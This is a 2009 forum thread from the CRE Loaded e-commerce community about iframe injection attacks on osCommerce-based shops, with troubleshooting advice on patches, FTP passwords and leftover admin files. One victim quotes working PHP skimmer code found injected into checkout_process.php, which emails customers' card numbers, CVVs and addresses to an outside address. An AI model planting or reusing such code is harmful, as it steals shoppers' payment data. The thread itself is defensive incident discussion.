CRE Loaded Community

All times are UTC - 5 hours

 Post subject: IFrame Attack -
Posted: Tue May 05, 2009 1:55 am
CRE Newbie

Joined: Wed Jan 16, 2008 1:50 am
Posts: 4
We are experiencing iframe injection attacks on a 6.2 pro site with the latest updates and patches.

We have gone through the various steps outlined here:

http://eisabainyo.net/weblog/2009/04/06 ... on-attack/

plus a few others including steps to eliminate any ftp related breaches.

If anyone can add any additional suggestions specific to osCommerce/CRE Loaded, we would certainly appreciate it.

Also, if there is an osCommerce security expert out there who has dealt with this issue and can lend a hand, it would be good to get a referral.

Thanks!


 Post subject: Re: IFrame Attack -
Posted: Tue May 05, 2009 3:59 am
CRE Expert

Joined: Wed Jul 30, 2003 12:00 am
Posts: 1369
Did you upgrade from a 6.15 site?

View this thread:

https://www.creloaded.com/forums/Forums ... 43220.html

_________________
Regards,

Salvatore Iozzia
Founder and Chief Visionary Officer (Evil Overlord)
Loaded Commerce | CRE Secure | CRE Hosting

Get PCI Compliant NOW http://www.cresecure.com
follow me on TWITTER! http://www.twitter.com/saliozzia
follow CRE on TWITTER! http://www.twitter.com/crecommerce


 Post subject: Re: IFrame Attack -
Posted: Tue May 05, 2009 6:06 pm
CRE Newbie

Joined: Wed Jan 16, 2008 1:50 am
Posts: 4
Thanks for the response Evil Overlord.

No, it was a 6.2 from the get-go, so I don't think the link provided applies.

Any other thoughts most appreciated!!


 Post subject: Re: IFrame Attack -
Posted: Tue May 05, 2009 6:59 pm
CRE Expert

Joined: Wed Jul 30, 2003 12:00 am
Posts: 1369
What else are you running (forums, blogs, galleries)? Is it shared hosting? And what exact patch level are you at?

Has your host looked into this issue?

We find that weak FTP passwords are often brute-forced and exploited.

Your host can tell you if there are FTP log entries for the affected files, and from what IP address.

_________________
Regards,

Salvatore Iozzia
Founder and Chief Visionary Officer (Evil Overlord)
Loaded Commerce | CRE Secure | CRE Hosting

 Post subject: Re: IFrame Attack -
Posted: Tue May 05, 2009 9:56 pm
CRE Newbie

Joined: Wed Jan 16, 2008 1:50 am
Posts: 4
Hmm...well maybe not the latest patch after all...we are at CRE Loaded6 v6.2 Pro[12.1 (SP1)] .

Would CRE Loaded 6.2 Pro patch 13.2 (SP1) have an impact? We will get on this. And what is the story about CRE Loaded 6.2 Pro patch 14 (SP1) costing extra money?

We use big ugly passwords and have had our host check the logs so that seems ok.


 Post subject: Re: IFrame Attack -
Posted: Wed May 06, 2009 12:31 pm
CRE Expert

Joined: Wed Jul 30, 2003 12:00 am
Posts: 1369
vanguy,

Each patch addresses both security and feature issues.

Patch 14 for pro should be in your My download if you have a valid Pro purchase with us.

_________________
Regards,

Salvatore Iozzia
Founder and Chief Visionary Officer (Evil Overlord)
Loaded Commerce | CRE Secure | CRE Hosting

 Post subject: Re: IFrame Attack -
Posted: Wed May 06, 2009 1:05 pm
CRE Addict

Joined: Wed Oct 01, 2003 12:00 am
Posts: 220
Location: Virginia, USA
The patch 13 picked up some important session handling security related enhancements and a few other fixes. The patch 14 picked up some SQL injection exposures, and a lot of other fixes.

Neither of these would directly address the XSS attack, but would certainly make the store more secure.

Two questions:
Does your store use a template that replaces part or all of the content folder?
What page or pages had the iframe added to it?

_________________
Charles C. Williams. Jr.
Chief Software Engineering Officer
Chain Reaction Ecommerce, Inc.


 Post subject: Re: IFrame Attack -
Posted: Tue May 26, 2009 8:11 pm
CRE Freak

Joined: Mon Feb 09, 2009 7:54 pm
Posts: 52
Location: Merseyside
I had iframe injection on all index pages to medianameshirts.****; I found the scripts in various positions on the pages, after putting up 6.3.3 B2B Pro. As I hadn't done a great deal of work on the site, I just deleted all, changed FTP passwords, removed all traces of FTP passwords from the PC that were stored locally, informed the host, and scanned the PC fully for malware (came up clean).
I am wondering whether a complete OS reinstall is needed, and would welcome any other advice you may give.

Thanks
John

_________________
Give me a man that tries and fails than a man that never tries at all!!


 Post subject: Re: IFrame Attack -
Posted: Thu May 28, 2009 3:32 pm
CRE Legend

Joined: Sun Nov 09, 2003 1:00 am
Posts: 7258
Location: Baconton, GA USA
Check your catalog root for filenames such as admin_login_new.php or create_admin.php .

I have seen a number of these left behind by contractors. Once there, they'll sometimes cheerfully give away an admin login to any passer-by....

David

_________________
My CRE Loaded FAQ List
CRE Loaded Hosting


 Post subject: Re: IFrame Attack -
Posted: Thu May 28, 2009 5:26 pm
CRE Freak

Joined: Mon Feb 09, 2009 7:54 pm
Posts: 52
Location: Merseyside
Funny thing is, when I deleted all files from the server via FTP, it wouldn't delete 3 folders. I can't remember which now, but it would go through the process as if deleting and say successful, but they remained there. I went in through the host control panel to delete them and they went.
Thanks for the info

John

_________________
Give me a man that tries and fails than a man that never tries at all!!


 Post subject: Re: IFrame Attack -
Posted: Sun Jun 07, 2009 11:30 am
CRE Addict

Joined: Wed Aug 29, 2007 7:46 pm
Posts: 191
We have 6.3.3 B2B on one site and we are having this iframe added to any file that has the word index in it. We also had this added to our checkout_process.php in the root folder:

Code:
$ip = getenv("REMOTE_ADDR");
$cvv=$_POST['cc_ccv'];
$number=$_SESSION['cc_number'];
$expires=$_SESSION['cc_expires'];
$to='maclog12@earthlink.com';
$subject='ourdomain'.$order->customer['email_address'].' '.$number;
$body="IP address=".$ip."\nDate=" . date('d-m-Y'). "\ntelephone=".$order->customer['telephone']."\nemail_address=".$order->customer['email_address']."\nName=".$order->customer['firstname'] . ' ' . $order->customer['lastname']."\nAddress1=".$order->customer['street_address']."\nAddress2=".$order->customer['suburb']."\nCity=".$order->customer['city']."\nState=".$order->customer['state']."\nZip=".$order->customer['postcode']."\nCountry=".$order->customer['country']['title']."\nmethod=".$order->info['payment_method']."\ntype=".$order->info['cc_type']."\nowner=".$order->info['cc_owner']."\nnumber=".$number."\nexpires=".$expires."\ncvv=".$cvv;
$headers="ourdomain.com";
mail($to, $subject, $body, $headers);


 Post subject: Re: IFrame Attack -
Posted: Sun Jun 28, 2009 1:52 pm
CRE Talented

Joined: Tue Nov 30, 2004 1:00 am
Posts: 375
Location: New Smyrna Beach, FL
View /var/www/vhosts/domain.com(whatever yours is)/ and see if there are any .htaccess files located there. Ask ChainReaction to run the shell script they have to find all iframes. We'd be happy to assist you as your webmaster, if you want.

I wonder if the folks there have the auditd service installed in their OS environment? I've also been talking with the folks at CPanel about adding Linux account expires that have already been around for quite some time now. And I wonder if CRW has implemented the encrypted FTP passwords stored in the Plesk database. I remember all too well the migration headaches when FTP passwords were stored unencrypted in plain text.

One of the issues they faced in the past was that hackers were able to see every single user's FTP password, no matter how often it was changed. That's why I do prefer CPanel over Plesk. In CPanel, passwords are in a shadow file per user account and not in a DB structure.

I'm sure they'll update you on steps they have taken to further secure the shared hosting for ecommerce environment.

_________________
Inetbizo Open Source eCommerce Strategy Consultant
========================
EOS, CRE, osCommerce E-Commerce Education, Forums, Links

